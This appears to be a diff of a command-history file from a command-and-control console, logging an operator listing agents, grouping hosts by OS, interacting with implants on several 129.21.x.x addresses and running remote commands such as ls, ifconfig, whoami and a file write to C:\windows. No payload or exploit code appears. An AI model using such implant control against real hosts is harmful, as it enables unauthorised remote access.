541 | +shutdown
542 |
543 | # 2021-03-17 11:31:58.204173
544 | +db
545 |
546 | # 2021-03-17 11:32:00.012314
547 | +list
548 |
549 | # 2021-03-17 11:32:03.698800
550 | +back
551 |
552 | # 2021-03-17 11:32:04.996500
553 | +ls
554 |
555 | # 2021-03-17 11:32:07.333272
556 | +agents
557 |
558 | # 2021-03-17 11:32:17.260310
559 | +help
560 |
561 | # 2021-03-17 11:32:26.485397
562 | +db
563 |
564 | # 2021-03-17 11:32:27.436775
565 | +help
566 |
567 | # 2021-03-17 11:33:04.628675
568 | +group 129.21.100.241 os macos
569 |
570 | # 2021-03-17 11:34:00.222148
571 | +exit
572 |
573 | # 2021-03-17 11:34:05.653352
574 | +db
575 |
576 | # 2021-03-17 11:34:06.221743
577 | +lsit
578 |
579 | # 2021-03-17 11:34:07.146180
580 | +list
581 |
582 | # 2021-03-17 11:34:13.537292
583 | +group 129.21.100.241 os macos
584 |
585 | # 2021-03-17 11:34:57.126935
586 | +back
587 |
588 | # 2021-03-17 11:34:57.739976
589 | +exit
590 |
591 | # 2021-03-17 11:35:02.087327
592 | +db
593 |
594 | # 2021-03-17 11:35:02.791449
595 | +list
596 |
597 | # 2021-03-17 11:35:08.441396
598 | +group 129.21.100.241 os macos
599 |
600 | # 2021-03-17 11:35:30.968886
601 | +db
602 |
603 | # 2021-03-17 11:35:32.690417
604 | +group 129.21.100.241 os macos
605 |
606 | # 2021-03-17 11:40:01.988562
607 | +back
608 |
609 | # 2021-03-17 11:40:02.864463
610 | +exi
611 |
612 | # 2021-03-17 11:40:04.877545
613 | +exit
614 |
615 | # 2021-03-17 11:40:08.093215
616 | +db
617 |
618 | # 2021-03-17 11:40:12.959485
619 | +group 129.21.100.241 os macosv2
620 |
621 | # 2021-03-17 11:41:28.492830
622 | +back
623 |
624 | # 2021-03-17 11:41:29.307559
625 | +exit
626 |
627 | # 2021-03-17 11:41:33.116947
628 | +db
629 |
630 | # 2021-03-17 11:41:34.403226
631 | +group 129.21.100.241 os macosv2
632 |
633 | # 2021-03-17 11:42:15.746172
634 | +db
635 |
636 | # 2021-03-17 11:42:17.862560
637 | +group 129.21.100.241 os macosv2
638 |
639 | # 2021-03-17 11:42:21.384247
640 | +list
641 |
642 | # 2021-03-17 11:44:18.656267
643 | +back
644 |
645 | # 2021-03-17 11:44:21.835023
646 | +exit
647 |
648 | # 2021-03-17 11:44:24.898360
649 | +db
650 |
651 | # 2021-03-17 11:44:26.884356
652 | +group 129.21.100.241 os macosv3
653 |
654 | # 2021-03-17 11:45:34.931448
655 | +back
656 |
657 | # 2021-03-17 11:45:35.721673
658 | +exit
659 |
660 | # 2021-03-17 11:45:40.481391
661 | +db
662 |
663 | # 2021-03-17 11:45:42.417409
664 | +group 129.21.100.241 os macosv4
665 |
666 | # 2021-03-17 11:49:23.886579
667 | +back
668 |
669 | # 2021-03-17 11:49:39.854330
670 | +interact os macosv4
671 |
672 | # 2021-03-17 11:49:43.917973
673 | +help
674 |
675 | # 2021-03-17 11:52:31.549020
676 | +back
677 |
678 | # 2021-03-17 11:52:32.567792
679 | +exit
680 |
681 | # 2021-03-17 11:52:42.209236
682 | +list
683 |
684 | # 2021-03-17 11:52:45.007959
685 | +agents
686 |
687 | # 2021-03-17 11:52:48.768981
688 | +interact os macosv4
689 |
690 | # 2021-03-17 11:52:50.211465
691 | +list
692 |
693 | # 2021-03-17 11:53:11.846062
694 | +back
695 |
696 | # 2021-03-17 11:53:12.723950
697 | +exit
698 |
699 | # 2021-03-17 11:53:16.329158
700 | +interact os macosv4
701 |
702 | # 2021-03-17 11:53:17.295244
703 | +list
704 |
705 | # 2021-03-17 11:53:32.433563
706 | +back
707 |
708 | # 2021-03-17 11:53:35.628061
709 | +interact a 129.21.100.241
710 |
711 | # 2021-03-17 11:53:37.376744
712 | +list
713 |
714 | # 2021-03-17 11:55:20.786821
715 | +interact a 129.21.100.241
716 |
717 | # 2021-03-17 11:55:21.680988
718 | +list
719 |
720 | # 2021-03-17 11:55:28.577726
721 | +back
722 |
723 | # 2021-03-17 11:55:37.292966
724 | +interact o macosv4
725 |
726 | # 2021-03-17 11:55:38.724071
727 | +list
728 |
729 | # 2021-03-17 11:55:43.189768
730 | +back
731 |
732 | # 2021-03-17 11:55:45.849944
733 | +interact o macosv5
734 |
735 | # 2021-03-17 11:55:46.688784
736 | +list
737 |
738 | # 2021-03-17 11:55:48.715833
739 | +back
740 |
741 | # 2021-03-17 11:55:51.907494
742 | +interact o macosv4
743 |
744 | # 2021-03-17 11:55:52.740426
745 | +list
746 |
747 | # 2021-03-17 11:56:38.077723
748 | +back
749 |
750 | # 2021-03-17 11:56:39.221411
751 | +exit
752 |
753 | # 2021-03-17 11:56:47.268258
754 | +interact a 129.21.100.241
755 |
756 | # 2021-03-17 11:56:48.590005
757 | +list
758 |
759 | # 2021-03-17 11:58:23.509614
760 | +back
761 |
762 | # 2021-03-17 11:58:24.662932
763 | +exit
764 |
765 | # 2021-03-17 11:58:28.242952
766 | +interact a 129.21.100.241
767 |
768 | # 2021-03-17 11:58:29.257256
769 | +list
770 |
771 | # 2021-03-17 11:58:38.398818
772 | +back
773 |
774 | # 2021-03-17 11:58:45.016163
775 | +interact os macosv4
776 |
777 | # 2021-03-17 11:58:45.993415
778 | +list
779 |
780 | # 2021-03-17 12:21:48.575997
781 | +cmd
782 |
783 | # 2021-03-17 12:21:50.673664
784 | +ls
785 |
786 | # 2021-03-17 12:23:42.807431
787 | +interact os macosv4
788 |
789 | # 2021-03-17 12:23:44.451030
790 | +cmd
791 |
792 | # 2021-03-17 12:23:46.067927
793 | +ls
794 |
795 | # 2021-03-17 12:27:38.797769
796 | +interact os macosv4
797 |
798 | # 2021-03-17 12:27:39.740496
799 | +cmd
800 |
801 | # 2021-03-17 12:27:40.195053
802 | +ls
803 |
804 | # 2021-03-17 12:28:25.256176
805 | +ls -la
806 |
807 | # 2021-03-17 12:29:35.445845
808 | +which go
809 |
810 | # 2021-03-17 12:30:43.191625
811 | +ifconfig
812 |
813 | # 2021-03-17 12:31:06.705369
814 | +ifconfig | grep inet
815 |
816 | # 2021-03-17 12:31:36.158312
817 | +bacck
818 |
819 | # 2021-03-17 12:31:40.350502
820 | +back
821 |
822 | # 2021-03-17 12:31:43.711292
823 | +ls
824 |
825 | # 2021-03-17 12:31:45.298912
826 | +list
827 |
828 | # 2021-03-17 12:31:48.433656
829 | +agents
830 |
831 | # 2021-03-17 12:31:50.863677
832 | +help
833 |
834 | # 2021-03-17 12:31:58.116094
835 | +interact a 129.21.100.241
836 |
837 | # 2021-03-17 12:31:59.869824
838 | +ls
839 |
840 | # 2021-03-17 12:32:00.645766
841 | +list
842 |
843 | # 2021-03-17 12:32:09.124353
844 | +cmd
845 |
846 | # 2021-03-17 12:32:09.986213
847 | +ping
848 |
849 | # 2021-03-17 12:32:18.314930
850 | +ping 8.8.8.8
851 |
852 | # 2021-03-17 12:32:32.629318
853 | +ping -h
854 |
855 | # 2021-03-17 12:32:37.636291
856 | +which og
857 |
858 | # 2021-03-17 12:32:39.803384
859 | +which go
860 |
861 | # 2021-03-17 12:32:55.263307
862 | +ping -h
863 |
864 | # 2021-03-17 12:32:59.827840
865 | +which go
866 |
867 | # 2021-03-17 12:33:06.596483
868 | +clear
869 |
870 | # 2021-03-17 12:33:10.450048
871 | +help
872 |
873 | # 2021-03-17 12:33:13.944058
874 | +back
875 |
876 | # 2021-03-17 12:33:17.686042
877 | +help
878 |
879 | # 2021-03-17 12:33:19.046405
880 | +ping
881 |
882 | # 2021-03-17 12:33:24.620952
883 | +kill
884 |
885 | # 2021-03-17 12:33:41.166052
886 | +back
887 |
888 | # 2021-03-17 12:33:47.278534
889 | +interact os macosv4
890 |
891 | # 2021-03-17 12:33:48.318217
892 | +ping
893 |
894 | # 2021-03-17 12:34:07.907073
895 | +interact os macosv4
896 |
897 | # 2021-03-17 12:34:09.259024
898 | +ping
899 |
900 | # 2021-03-17 12:34:16.079090
901 | +kill
902 |
903 | # 2021-03-17 12:35:56.868682
904 | +back
905 |
906 | # 2021-03-17 12:35:58.579741
907 | +help
908 |
909 | # 2021-03-17 12:38:36.820967
910 | +back
911 |
912 | # 2021-03-17 12:38:37.856164
913 | +exit
914 |
915 | # 2021-03-17 12:39:59.473954
916 | +help
917 |
918 | # 2021-03-17 12:41:00.973103
919 | +list
920 |
921 | # 2021-03-17 12:41:23.980695
922 | +help
923 |
924 | # 2021-03-17 12:41:26.848074
925 | +agents
926 |
927 | # 2021-03-17 12:46:55.204570
928 | +exit
929 |
930 | # 2021-03-17 12:47:05.289258
931 | +agents
932 |
933 | # 2021-03-17 12:48:25.273934
934 | +exit
935 |
936 | # 2021-03-17 12:48:28.271928
937 | +agents
938 |
939 | # 2021-03-17 12:49:44.581169
940 | +exit
941 |
942 | # 2021-03-17 12:49:47.276422
943 | +agents
944 |
945 | # 2021-03-17 12:51:45.718236
946 | +exit
947 |
948 | # 2021-03-17 12:51:49.271885
949 | +agents
950 |
951 | # 2021-03-17 12:52:55.675313
952 | +exit
953 |
954 | # 2021-03-17 12:52:59.420402
955 | +agents
956 |
957 | # 2021-03-17 12:56:55.358567
958 | +exit
959 |
960 | # 2021-03-17 12:57:04.433386
961 | +agents
962 |
963 | # 2021-03-17 12:58:21.243014
964 | +exit
965 |
966 | # 2021-03-17 12:58:24.608336
967 | +agents
968 |
969 | # 2021-03-17 12:58:48.585615
970 | +help
971 |
972 | # 2021-03-17 12:59:03.550549
973 | +db
974 |
975 | # 2021-03-17 12:59:04.678738
976 | +help
977 |
978 | # 2021-03-17 12:59:06.285347
979 | +list
980 |
981 | # 2021-03-17 12:59:09.393650
982 | +back
983 |
984 | # 2021-03-17 12:59:14.736689
985 | +interact os macosv4
986 |
987 | # 2021-03-17 12:59:18.086887
988 | +help
989 |
990 | # 2021-03-17 12:59:27.317803
991 | +ping
992 |
993 | # 2021-03-17 12:59:29.927225
994 | +cmd
995 |
996 | # 2021-03-17 12:59:34.191635
997 | +help
998 |
999 | # 2021-03-17 12:59:47.304861
1000 | +back
1001 |
1002 | # 2021-03-17 12:59:50.023765
1003 | +help
1004 |
1005 | # 2021-03-17 12:59:52.182001
1006 | +back
1007 |
1008 | # 2021-03-17 12:59:53.509951
1009 | +db
1010 |
1011 | # 2021-03-17 12:59:55.123613
1012 | +meta
1013 |
1014 | # 2021-03-17 13:00:00.884469
1015 | +help
1016 |
1017 | # 2021-03-17 13:00:10.622101
1018 | +list
1019 |
1020 | # 2021-03-17 13:00:38.802612
1021 | +exit
1022 |
1023 | # 2021-03-17 13:00:44.800349
1024 | +agents
1025 |
1026 | # 2021-03-17 13:01:02.345706
1027 | +exit
1028 |
1029 | # 2021-03-17 13:01:07.047373
1030 | +agents
1031 |
1032 | # 2021-03-17 13:02:07.817518
1033 | +back
1034 |
1035 | # 2021-03-17 13:02:08.818955
1036 | +exit
1037 |
1038 | # 2021-03-17 13:02:15.521519
1039 | +agents
1040 |
1041 | # 2021-03-17 13:02:45.670490
1042 | +db
1043 |
1044 | # 2021-03-17 13:02:46.310247
1045 | +meta
1046 |
1047 | # 2021-03-17 13:02:56.418674
1048 | +agents
1049 |
1050 | # 2021-03-17 13:02:58.145265
1051 | +back
1052 |
1053 | # 2021-03-17 13:02:58.800714
1054 | +exit
1055 |
1056 | # 2021-03-17 13:03:11.520311
1057 | +agents
1058 |
1059 | # 2021-03-17 13:04:40.370343
1060 | +back
1061 |
1062 | # 2021-03-17 13:04:41.443079
1063 | +exit
1064 |
1065 | # 2021-03-17 13:22:49.050109
1066 | +interact os macosv4
1067 |
1068 | # 2021-03-17 13:22:50.280632
1069 | +cmd
1070 |
1071 | # 2021-03-17 13:22:51.823343
1072 | +back
1073 |
1074 | # 2021-03-17 13:22:53.322393
1075 | +ping
1076 |
1077 | # 2021-03-17 13:41:58.981363
1078 | +cmd
1079 |
1080 | # 2021-03-17 13:42:05.354713
1081 | +ls -al
1082 |
1083 | # 2021-03-17 13:42:41.111224
1084 | +yeah
1085 |
1086 | # 2021-03-17 13:42:46.090974
1087 | +pwd
1088 |
1089 | # 2021-03-17 13:43:03.898135
1090 | +back
1091 |
1092 | # 2021-03-17 13:43:06.295883
1093 | +kill
1094 |
1095 | # 2021-03-17 13:43:10.429176
1096 | +ping
1097 |
1098 | # 2021-03-17 15:07:58.617370
1099 | +db
1100 |
1101 | # 2021-03-17 15:08:00.100166
1102 | +help
1103 |
1104 | # 2021-03-17 15:08:02.906265
1105 | +removeall
1106 |
1107 | # 2021-03-17 15:08:05.962911
1108 | +list
1109 |
1110 | # 2021-03-17 15:09:09.203882
1111 | +back
1112 |
1113 | # 2021-03-17 15:09:10.285466
1114 | +agents
1115 |
1116 | # 2021-03-17 15:09:23.137504
1117 | +exit
1118 |
1119 | # 2021-03-18 17:42:58.761992
1120 | +interact
1121 |
1122 | # 2021-03-19 12:47:01.193384
1123 | +ls
1124 |
1125 | # 2021-03-19 12:47:02.609514
1126 | +help
1127 |
1128 | # 2021-03-19 12:47:04.775093
1129 | +interact
1130 |
1131 | # 2021-03-19 12:47:12.360778
1132 | +interact a 129.21.100.241
1133 |
1134 | # 2021-03-19 12:47:13.638623
1135 | +cmd
1136 |
1137 | # 2021-03-19 12:47:26.654209
1138 | +ls
1139 |
1140 | # 2021-03-19 12:47:33.764027
1141 | +ls -la
1142 |
1143 | # 2021-03-19 12:47:40.981205
1144 | +which go
1145 |
1146 | # 2021-03-19 12:48:55.224083
1147 | +back
1148 |
1149 | # 2021-03-19 12:48:57.464442
1150 | +exit
1151 |
1152 | # 2021-03-19 12:49:07.603509
1153 | +interact a 129.21.100.241
1154 |
1155 | # 2021-03-19 12:49:08.624947
1156 | +cmd
1157 |
1158 | # 2021-03-19 12:49:14.447996
1159 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
1160 |
1161 | # 2021-03-19 12:49:21.656199
1162 | +ls
1163 |
1164 | # 2021-03-19 12:49:22.887826
1165 | +hel
1166 |
1167 | # 2021-03-19 12:49:24.397991
1168 | +help
1169 |
1170 | # 2021-03-19 12:50:00.914804
1171 | +ping
1172 |
1173 | # 2021-03-19 12:50:11.069074
1174 | +cmd
1175 |
1176 | # 2021-03-19 12:50:15.233122
1177 | +echo 'hello world'
1178 |
1179 | # 2021-03-19 12:50:23.348947
1180 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
1181 |
1182 | # 2021-03-19 12:50:28.301550
1183 | +cmd
1184 |
1185 | # 2021-03-19 12:50:30.138763
1186 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
1187 |
1188 | # 2021-03-19 12:51:21.321467
1189 | +cmd
1190 |
1191 | # 2021-03-19 12:51:22.969110
1192 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
1193 |
1194 | # 2021-03-19 12:52:58.195847
1195 | +cmd
1196 |
1197 | # 2021-03-19 12:52:59.161213
1198 | +echo hey what's good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
1199 |
1200 | # 2021-03-19 13:27:36.633263
1201 | +back
1202 |
1203 | # 2021-03-19 13:27:37.361514
1204 | +exit
1205 |
1206 | # 2021-03-19 13:31:11.615960
1207 | +interact a 129.21.100.241
1208 |
1209 | # 2021-03-19 13:31:12.540837
1210 | +cmd
1211 |
1212 | # 2021-03-19 13:31:17.904408
1213 | +echo yeah so basically yeah
1214 |
1215 | # 2021-03-19 13:31:24.077939
1216 | +cmd
1217 |
1218 | # 2021-03-19 13:31:33.225973
1219 | +echo yeah so basically yeah yeha yeah
1220 |
1221 | # 2021-03-19 13:31:40.464614
1222 | +echo yeah so basically yeah yeha yeah yeah yeah yeah yeah
1223 |
1224 | # 2021-03-19 13:31:47.163564
1225 | +echo yeah so basically yeah yeha yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah
1226 |
1227 | # 2021-03-19 13:31:56.375637
1228 | +echo yeah so basically yeah yeha yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah
1229 |
1230 | # 2021-03-19 13:32:20.858677
1231 | +echo yeah so basically yeah yeha yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah
1232 |
1233 | # 2021-03-19 13:32:41.771598
1234 | +echo hey whats good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or other
1235 |
1236 | # 2021-03-19 13:32:48.772475
1237 | +echo hey whats good i really really want to meet you and talkt ot you also the quick brown fox jumped over the something or othe'r
1238 |
1239 | # 2021-03-22 10:54:54.907391
1240 | +interact a 129.21.103.180
1241 |
1242 | # 2021-03-22 10:54:56.473100
1243 | +cmd
1244 |
1245 | # 2021-03-22 10:55:03.321465
1246 | +echo "so yeah what's up"
1247 |
1248 | # 2021-03-22 10:55:14.119454
1249 | +echo so yeha
1250 |
1251 | # 2021-03-22 10:55:23.116666
1252 | +echo "so yeah whats up"
1253 |
1254 | # 2021-03-22 10:55:38.312359
1255 | +whoami
1256 |
1257 | # 2021-03-22 10:55:42.857578
1258 | +echo "so yeah"
1259 |
1260 | # 2021-03-22 10:56:12.050106
1261 | +which ls
1262 |
1263 | # 2021-03-22 10:56:18.767612
1264 | +back
1265 |
1266 | # 2021-03-22 10:56:20.349830
1267 | +exit
1268 |
1269 | # 2021-03-22 16:26:51.728310
1270 | +interact a 129.21.103.180
1271 |
1272 | # 2021-03-22 16:26:52.842230
1273 | +cmd
1274 |
1275 | # 2021-03-22 16:26:56.270624
1276 | +echo "so yeah"
1277 |
1278 | # 2021-03-22 16:27:01.909195
1279 | +ping
1280 |
1281 | # 2021-03-22 16:27:10.430270
1282 | +which go
1283 |
1284 | # 2021-03-22 16:27:18.490946
1285 | +echo "so yeah basically"
1286 |
1287 | # 2021-03-22 16:27:25.023739
1288 | +echo so yeah
1289 |
1290 | # 2021-03-22 16:27:28.612367
1291 | +back
1292 |
1293 | # 2021-03-22 16:27:29.384852
1294 | +ping
1295 |
1296 | # 2021-03-22 16:27:33.845781
1297 | +kill
1298 |
1299 | # 2021-03-22 16:27:36.775314
1300 | +ping
1301 |
1302 | # 2021-03-22 16:27:56.632758
1303 | +cmd
1304 |
1305 | # 2021-03-22 16:28:03.501547
1306 | +which go
1307 |
1308 | # 2021-03-22 16:29:04.377882
1309 | +interact a 129.21.103.180
1310 |
1311 | # 2021-03-22 16:29:05.191441
1312 | +cmd
1313 |
1314 | # 2021-03-22 16:29:07.770583
1315 | +which go
1316 |
1317 | # 2021-03-22 16:29:56.678033
1318 | +interact a 129.21.103.180
1319 |
1320 | # 2021-03-22 16:29:57.340534
1321 | +cmd
1322 |
1323 | # 2021-03-22 16:29:58.635927
1324 | +which go
1325 |
1326 | # 2021-03-22 16:32:32.774348
1327 | +interact a 129.21.103.180
1328 |
1329 | # 2021-03-22 16:32:33.692994
1330 | +cmd
1331 |
1332 | # 2021-03-22 16:32:34.884151
1333 | +which go
1334 |
1335 | # 2021-03-23 23:54:23.535823
1336 | +interact a 129.21.103.180
1337 |
1338 | # 2021-03-23 23:54:24.489013
1339 | +cmd
1340 |
1341 | # 2021-03-23 23:54:26.636200
1342 | +ifconfig
1343 |
1344 | # 2021-03-23 23:54:38.494890
1345 | +ifconfig | grep inet
1346 |
1347 | # 2021-03-23 23:54:46.222296
1348 | +kill
1349 |
1350 | # 2021-03-23 23:54:48.592952
1351 | +back
1352 |
1353 | # 2021-03-23 23:54:49.895726
1354 | +kill
1355 |
1356 | # 2021-03-23 23:54:51.839134
1357 | +ping
1358 |
1359 | # 2021-03-23 23:55:01.107138
1360 | +back
1361 |
1362 | # 2021-03-23 23:55:02.291223
1363 | +exit
1364 |
1365 | # 2021-03-24 00:01:58.216516
1366 | +db
1367 |
1368 | # 2021-03-24 00:01:59.896215
1369 | +list
1370 |
1371 | # 2021-03-24 00:02:10.591028
1372 | +help
1373 |
1374 | # 2021-03-24 00:02:12.188127
1375 | +list
1376 |
1377 | # 2021-03-24 00:02:14.748488
1378 | +agents
1379 |
1380 | # 2021-03-24 00:06:54.969539
1381 | +db
1382 |
1383 | # 2021-03-24 00:06:55.664297
1384 | +list
1385 |
1386 | # 2021-03-24 00:06:57.990105
1387 | +back
1388 |
1389 | # 2021-03-24 00:06:59.917157
1390 | +db
1391 |
1392 | # 2021-03-24 00:07:00.308644
1393 | +ls
1394 |
1395 | # 2021-03-24 00:07:01.359543
1396 | +list
1397 |
1398 | # 2021-03-24 00:07:02.756676
1399 | +help
1400 |
1401 | # 2021-03-24 00:07:07.140780
1402 | +meta
1403 |
1404 | # 2021-03-24 00:07:10.896973
1405 | +back
1406 |
1407 | # 2021-03-24 00:07:11.956493
1408 | +help
1409 |
1410 | # 2021-03-24 00:09:02.190380
1411 | +agents
1412 |
1413 | # 2021-03-24 00:12:25.920680
1414 | +interact a 129.21.103.180
1415 |
1416 | # 2021-03-24 00:12:26.622003
1417 | +cmd
1418 |
1419 | # 2021-03-24 00:12:28.661063
1420 | +ifconfig | grep inet
1421 |
1422 | # 2021-03-24 11:42:22.938040
1423 | +agents
1424 |
1425 | # 2021-03-24 11:44:26.111814
1426 | +exit
1427 |
1428 | # 2021-03-24 11:57:42.216122
1429 | +agents
1430 |
1431 | # 2021-03-24 12:03:09.892945
1432 | +ls
1433 |
1434 | # 2021-03-24 12:03:10.901692
1435 | +list
1436 |
1437 | # 2021-03-24 12:03:14.781141
1438 | +interact a 129.21.103.180
1439 |
1440 | # 2021-03-24 12:03:17.854208
1441 | +ping
1442 |
1443 | # 2021-03-24 12:04:21.317075
1444 | +cmd
1445 |
1446 | # 2021-03-24 12:04:23.586041
1447 | +ls
1448 |
1449 | # 2021-03-24 12:04:27.590396
1450 | +ls -la
1451 |
1452 | # 2021-03-24 12:04:34.045289
1453 | +back
1454 |
1455 | # 2021-03-24 12:04:36.228516
1456 | +kill
1457 |
1458 | # 2021-03-24 12:06:36.040798
1459 | +agent
1460 |
1461 | # 2021-03-24 12:06:37.601769
1462 | +agnets
1463 |
1464 | # 2021-03-24 12:06:39.311519
1465 | +back
1466 |
1467 | # 2021-03-24 12:06:40.526579
1468 | +agents
1469 |
1470 | # 2021-03-24 12:06:54.049586
1471 | +db
1472 |
1473 | # 2021-03-24 12:06:57.876084
1474 | +help
1475 |
1476 | # 2021-03-24 12:07:01.189305
1477 | +list
1478 |
1479 | # 2021-03-24 12:07:09.639009
1480 | +meta
1481 |
1482 | # 2021-03-24 12:15:24.636073
1483 | +agents
1484 |
1485 | # 2021-03-24 12:15:27.748653
1486 | +help
1487 |
1488 | # 2021-03-24 12:15:29.640601
1489 | +interact a 129.21.103.180
1490 |
1491 | # 2021-03-24 12:15:32.409641
1492 | +cmd
1493 |
1494 | # 2021-03-24 12:15:42.608100
1495 | +echo "so yeah"
1496 |
1497 | # 2021-03-24 12:15:59.319722
1498 | +echo "so yeah""
1499 |
1500 | # 2021-03-24 12:16:07.604400
1501 | +echo s yeah
1502 |
1503 | # 2021-03-24 12:43:23.989881
1504 | +exit
1505 |
1506 | # 2021-03-24 12:51:01.210118
1507 | +interact a 129.21.103.180
1508 |
1509 | # 2021-03-24 12:51:02.029903
1510 | +cmd
1511 |
1512 | # 2021-03-24 12:51:03.110700
1513 | +ls
1514 |
1515 | # 2021-03-24 12:51:10.270050
1516 | +echo 'hello world'
1517 |
1518 | # 2021-03-24 12:53:20.722121
1519 | +agents
1520 |
1521 | # 2021-03-24 12:53:22.292676
1522 | +interact a 129.21.103.180
1523 |
1524 | # 2021-03-24 12:53:23.633736
1525 | +cmd
1526 |
1527 | # 2021-03-24 12:53:24.581166
1528 | +ls
1529 |
1530 | # 2021-03-24 12:53:28.631716
1531 | +echo 'hello world'
1532 |
1533 | # 2021-03-24 12:53:54.164792
1534 | +echo "hello world"
1535 |
1536 | # 2021-03-24 12:54:29.972321
1537 | +interact a 129.21.103.180
1538 |
1539 | # 2021-03-24 12:54:31.279927
1540 | +cmd
1541 |
1542 | # 2021-03-24 12:54:32.550100
1543 | +echo "hello world"
1544 |
1545 | # 2021-03-24 12:54:52.568432
1546 | +echo "hey what's good"
1547 |
1548 | # 2021-03-24 12:55:23.223403
1549 | +echo "hello wrold"
1550 |
1551 | # 2021-03-24 12:56:55.990431
1552 | +echo "hello what's good"
1553 |
1554 | # 2021-03-24 13:00:02.767208
1555 | +exit
1556 |
1557 | # 2021-03-24 13:02:41.885485
1558 | +interact a 129.21.103.180
1559 |
1560 | # 2021-03-24 13:02:44.059774
1561 | +back
1562 |
1563 | # 2021-03-24 13:02:50.020984
1564 | +interact a 8.8.8.8
1565 |
1566 | # 2021-03-24 13:02:51.235446
1567 | +cmd
1568 |
1569 | # 2021-03-24 13:02:51.795213
1570 | +ls
1571 |
1572 | # 2021-03-24 13:03:04.827517
1573 | +back
1574 |
1575 | # 2021-03-24 13:03:05.557562
1576 | +ping
1577 |
1578 | # 2021-03-24 13:03:18.382110
1579 | +back
1580 |
1581 | # 2021-03-24 13:09:21.291190
1582 | +claer
1583 |
1584 | # 2021-03-24 13:09:22.877093
1585 | +clear
1586 |
1587 | # 2021-03-24 13:09:33.773194
1588 | +agents
1589 |
1590 | # 2021-03-24 13:11:13.397021
1591 | +agnet
1592 |
1593 | # 2021-03-24 13:11:14.945244
1594 | +agents;
1595 |
1596 | # 2021-03-24 13:11:16.484361
1597 | +agents
1598 |
1599 | # 2021-03-24 13:14:23.856226
1600 | +interact a 8.8.8.8
1601 |
1602 | # 2021-03-24 13:14:25.205799
1603 | +cmd
1604 |
1605 | # 2021-03-24 13:14:25.749707
1606 | +ls
1607 |
1608 | # 2021-03-24 13:14:26.718644
1609 | +back
1610 |
1611 | # 2021-03-24 13:14:27.637299
1612 | +ping
1613 |
1614 | # 2021-03-24 13:14:29.682773
1615 | +kill
1616 |
1617 | # 2021-03-24 13:14:36.488786
1618 | +back
1619 |
1620 | # 2021-03-24 13:14:38.768823
1621 | +clear
1622 |
1623 | # 2021-03-24 13:25:37.235307
1624 | +agents
1625 |
1626 | # 2021-03-24 13:26:08.592259
1627 | +interact a 129.21.252.61
1628 |
1629 | # 2021-03-24 13:26:10.318472
1630 | +cmd
1631 |
1632 | # 2021-03-24 13:26:13.022883
1633 | +dir
1634 |
1635 | # 2021-03-24 13:26:49.160762
1636 | +echo '' > C:\windows\test.txt
1637 |
1638 | # 2021-03-24 13:29:24.958768
1639 | +exit
1640 |
1641 | # 2021-03-24 14:20:45.083003
1642 | +interact a 129.21.252.61
1643 |
1644 | # 2021-03-24 14:20:47.206050
1645 | +ping
1646 |
1647 | # 2021-03-24 14:20:50.130308
1648 | +back
1649 |
1650 | # 2021-03-24 14:20:56.687439
1651 | +interact a 129.21.103.180
1652 |
1653 | # 2021-03-24 14:20:57.777217
1654 | +ping
1655 |
1656 | # 2021-03-24 14:21:29.360882
1657 | +interact a 129.21.103.180
1658 |
1659 | # 2021-03-24 14:21:30.295295
1660 | +ping
1661 |
1662 | # 2021-03-24 14:22:27.190984
1663 | +interact a 129.21.103.180
1664 |
1665 | # 2021-03-24 14:22:27.902384
1666 | +ping
1667 |
1668 | # 2021-03-24 14:22:43.489449
1669 | +interact a 129.21.103.180
1670 |
1671 | # 2021-03-24 14:22:44.534928
1672 | +ping
1673 |
1674 | # 2021-03-24 14:23:50.970262
1675 | +interact a 129.21.103.180
1676 |
1677 | # 2021-03-24 14:23:51.832652
1678 | +ping
1679 |
1680 | # 2021-03-24 14:24:19.731410
1681 | +interact a 129.21.103.180
1682 |
1683 | # 2021-03-24 14:24:20.885868
1684 | +ping
1685 |
1686 | # 2021-03-24 14:24:35.218174
1687 | +agents
1688 |
1689 | # 2021-03-24 14:24:37.794451
1690 | +back
1691 |
1692 | # 2021-03-24 14:24:39.124419
1693 | +agents
1694 |
1695 | # 2021-03-24 14:27:12.231765
1696 | +interact a 129.21.103.180
1697 |
1698 | # 2021-03-24 14:27:13.139739
1699 | +ping
1700 |
1701 | # 2021-03-24 14:27:26.940540
1702 | +agents
1703 |
1704 | # 2021-03-24 14:27:28.745024
1705 | +back
1706 |
1707 | # 2021-03-24 14:27:29.843649
1708 | +agents
1709 |
1710 | # 2021-03-24 14:32:56.736615
1711 | +interact a 129.21.103.180
1712 |
1713 | # 2021-03-24 14:32:57.846624
1714 | +ping
1715 |
1716 | # 2021-03-24 14:33:00.488358
1717 | +back
1718 |
1719 | # 2021-03-24 14:33:01.536384
1720 | +agents
1721 |
1722 | # 2021-03-24 14:33:04.110118
1723 | +clear
1724 |
1725 | # 2021-03-24 14:33:06.013805
1726 | +ls
1727 |
1728 | # 2021-03-24 14:33:10.355920
1729 | +db
1730 |
1731 | # 2021-03-24 14:33:10.791465
1732 | +ls
1733 |
1734 | # 2021-03-24 14:33:11.831308
1735 | +list
1736 |
1737 | # 2021-03-24 14:33:14.445013
1738 | +help
1739 |
1740 | # 2021-03-24 14:33:26.863673
1741 | +removeall
1742 |
1743 | # 2021-03-24 14:33:29.522113
1744 | +list
1745 |
1746 | # 2021-03-24 14:33:30.727036
1747 | +back
1748 |
1749 | # 2021-03-24 14:33:32.010037
1750 | +interact a 129.21.103.180
1751 |
1752 | # 2021-03-24 14:33:33.406992
1753 | +ping
1754 |
1755 | # 2021-03-24 14:34:03.820480
1756 | +agents
1757 |
1758 | # 2021-03-24 14:34:06.203808
1759 | +db
1760 |
1761 | # 2021-03-24 14:34:08.368403
1762 | +removeall
1763 |
1764 | # 2021-03-24 14:34:10.095716
1765 | +back
1766 |
1767 | # 2021-03-24 14:34:11.737979
1768 | +interact a 129.21.103.180
1769 |
1770 | # 2021-03-24 14:34:13.348611
1771 | +ping
1772 |
